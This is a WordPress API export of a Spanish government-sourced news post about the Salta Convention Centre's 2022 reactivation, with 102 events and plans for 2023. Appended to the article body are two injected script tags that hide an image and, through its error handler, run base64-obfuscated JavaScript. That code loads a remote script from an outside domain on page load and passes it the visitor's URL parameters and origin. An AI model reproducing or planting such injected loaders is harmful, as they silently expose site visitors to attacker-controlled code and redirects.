{"id":2005,"date":"2022-12-27T13:12:36","date_gmt":"2022-12-27T16:12:36","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2005"},"modified":"2025-08-14T00:26:56","modified_gmt":"2025-08-14T03:26:56","slug":"el-centro-de-convenciones-de-salta-cierra-un-gran-ano-de-reactivacion","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2005","title":{"rendered":"El Centro de Convenciones de Salta cierra un gran a\u00f1o de reactivaci\u00f3n"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#f42354\"><em>Tras 2 a\u00f1os de receso, la sede de eventos mejor\u00f3 su infraestructura y alberg\u00f3 102 eventos durante el 2022, rompiendo la estacionalidad y convirti\u00e9ndose nuevamente en l\u00edder de la regi\u00f3n.<\/em><\/h4>\n\n\n\n<p>En enero del 2022, luego de un receso de 2 a\u00f1os por la pandemia, el Centro de Convenciones de Salta volvi\u00f3 a su actividad habitual y obtuvo grandes resultados. Durante este a\u00f1o en la sede de reuniones se realizaron 102 eventos que sumaron 351916 asistentes y m\u00e1s de 70 empresas proveedoras para eventos, manteniendo las instalaciones ocupadas durante 155 d\u00edas.&nbsp;<\/p>\n\n\n\n<p>En esta nueva apertura, el Centro de Convenciones de Salta logr\u00f3 la reactivaci\u00f3n de toda la cadena de proveedores que trabajan en el desarrollo de eventos, como organizadores y productores, catering y gastronom\u00eda, t\u00e9cnica audiovisual, paneler\u00eda y armado de estructuras para ferias y exposiciones, ambientaci\u00f3n, acreditaciones, venta de productos locales en congresos, servicios de limpieza, seguridad y emergencias m\u00e9dicas, entre otros. De esta manera se convirti\u00f3 nuevamente en dinamizador de la econom\u00eda regional, generando posibilidades y fuentes de trabajo genuino en la provincia de Salta.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5330-el-centro-de-convenciones-de-salta-cierra-un-gran-anio-de-reactivacion.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5330-el-centro-de-convenciones-de-salta-cierra-un-gran-anio-de-reactivacion.jpg\" alt=\"El Centro de Convenciones de Salta cierra un gran a\u00f1o de reactivaci\u00f3n\"\/><\/a><\/figure>\n\n\n\n<p>Para su puesta a punto antes de retomar la actividad, la Sociedad del Estado trabaj\u00f3 junto a distintas \u00e1reas del Gobierno de la Provincia en el reacondicionamiento edilicio, con un plan de mejoras y mantenimiento de todas las superficies cubiertas, haciendo especial \u00e9nfasis en la restauraci\u00f3n del predio exterior. Con esto, se busc\u00f3 conseguir la mayor optimizaci\u00f3n y utilizaci\u00f3n de todo el recinto, con el objetivo de activar la oferta de los espacios y salones para la realizaci\u00f3n de eventos, nacionales e internacionales, impulsando as\u00ed nuevamente el Turismo de Reuniones en la provincia.<\/p>\n\n\n\n<p>Cabe destacar que, al iniciar la pandemia, el Centro de Convenciones Salta ten\u00eda confirmados y reservados grandes eventos y congresos internacionales para el 2020, que debieron postergarse de manera imprevista. Gracias a un esfuerzo conjunto con los organizadores, se reprogramaron fechas y se reformularon espacios para que los mismos puedan realizarse de manera exitosa durante el 2022.<\/p>\n\n\n\n<p>Adem\u00e1s, se sumaron al calendario nuevos eventos de todo tipo, consiguiendo romper la estacionalidad con el desarrollo constante de actividades durante todo el a\u00f1o. Algunos de los eventos m\u00e1s destacados fueron la Feria de Vinos Argentinos FEVINAR, la celebraci\u00f3n del 50 aniversario del Tren a las Nubes, la Feria de Emprendedores \u201cPotencia\u201d, el Argentina Mining 2022, el Raid Columbia 2022, el Salta Boombox, festivales, recitales, jornadas y charlas de capacitaci\u00f3n de organismos p\u00fablicos y privados.<\/p>\n\n\n\n<p>Por otra parte, el Centro de Convenciones de Salta particip\u00f3 en ferias y congresos del sector de turismo de reuniones como el Meet Up Argentina, Conferencia de UFI LATAM, FIEXPO Latin America, el XII Congreso de AOCA y el XXXIV Encuentro Nacional de Destino de Eventos, siendo sede de los dos \u00faltimos. Estas participaciones les permitieron contactarse con los m\u00e1s destacados compradores a nivel mundial y seguir sumando herramientas para su crecimiento.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"908\" height=\"600\" data-id=\"2007\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/5331-el-centro-de-convenciones-de-salta-cierra-un-gran-anio-de-reactivacion.jpg\" alt=\"\" class=\"wp-image-2007\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/5331-el-centro-de-convenciones-de-salta-cierra-un-gran-anio-de-reactivacion.jpg 908w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/5331-el-centro-de-convenciones-de-salta-cierra-un-gran-anio-de-reactivacion-300x198.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/5331-el-centro-de-convenciones-de-salta-cierra-un-gran-anio-de-reactivacion-768x507.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/5331-el-centro-de-convenciones-de-salta-cierra-un-gran-anio-de-reactivacion-696x460.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/5331-el-centro-de-convenciones-de-salta-cierra-un-gran-anio-de-reactivacion-636x420.jpg 636w\" sizes=\"(max-width: 908px) 100vw, 908px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"907\" height=\"600\" data-id=\"2008\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/5332-el-centro-de-convenciones-de-salta-cierra-un-gran-anio-de-reactivacion.jpg\" alt=\"\" class=\"wp-image-2008\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/5332-el-centro-de-convenciones-de-salta-cierra-un-gran-anio-de-reactivacion.jpg 907w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/5332-el-centro-de-convenciones-de-salta-cierra-un-gran-anio-de-reactivacion-300x198.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/5332-el-centro-de-convenciones-de-salta-cierra-un-gran-anio-de-reactivacion-768x508.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/5332-el-centro-de-convenciones-de-salta-cierra-un-gran-anio-de-reactivacion-696x460.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/5332-el-centro-de-convenciones-de-salta-cierra-un-gran-anio-de-reactivacion-635x420.jpg 635w\" sizes=\"(max-width: 907px) 100vw, 907px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"560\" height=\"370\" data-id=\"2006\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/87024-el-centro-de-convenciones-de-salta-cierra-un-gran-anio-de-reactivacion.jpg\" alt=\"\" class=\"wp-image-2006\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/87024-el-centro-de-convenciones-de-salta-cierra-un-gran-anio-de-reactivacion.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/87024-el-centro-de-convenciones-de-salta-cierra-un-gran-anio-de-reactivacion-300x198.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>El 11 de agosto el Centro de Convenciones de Salta cumpli\u00f3 su 15 aniversario, tiempo en el que alberg\u00f3 901 eventos que contaron con un total de 2.333.349 asistentes, posicionando a la provincia de Salta como Sede de Eventos en el mercado internacional.<\/p>\n\n\n\n<p>Y la sede de eventos sigue proyectando para seguir creciendo, con un calendario 2023 que empieza a tener forma. Ya se recibieron m\u00faltiples consultas y pre reservas, de las que se confirmaron el Congreso Nacional de Reumatolog\u00eda y el Congreso Nacional de Terapia Intensiva para el segundo semestre del a\u00f1o. Para el pr\u00f3ximo a\u00f1o se esperan distintos tipos de eventos, con renovados formatos que involucren m\u00e1s proveedores, artistas y tecnolog\u00eda de innovaci\u00f3n.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-centro-de-convenciones-de-salta-cierra-un-gran-anio-de-reactivacion-87024\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Tras 2 a\u00f1os de receso, la sede de eventos mejor\u00f3 su infraestructura y alberg\u00f3 102 eventos durante el 2022, rompiendo la estacionalidad y convirti\u00e9ndose nuevamente en l\u00edder de la regi\u00f3n. En enero del 2022, luego de un receso de 2 a\u00f1os por la pandemia, el Centro de Convenciones de Salta volvi\u00f3 a su actividad habitual [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2006,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16],"tags":[],"class_list":{"0":"post-2005","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2005"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2005"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2005\/revisions"}],"predecessor-version":[{"id":7228,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2005\/revisions\/7228"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2006"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2005"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2005"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2005"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}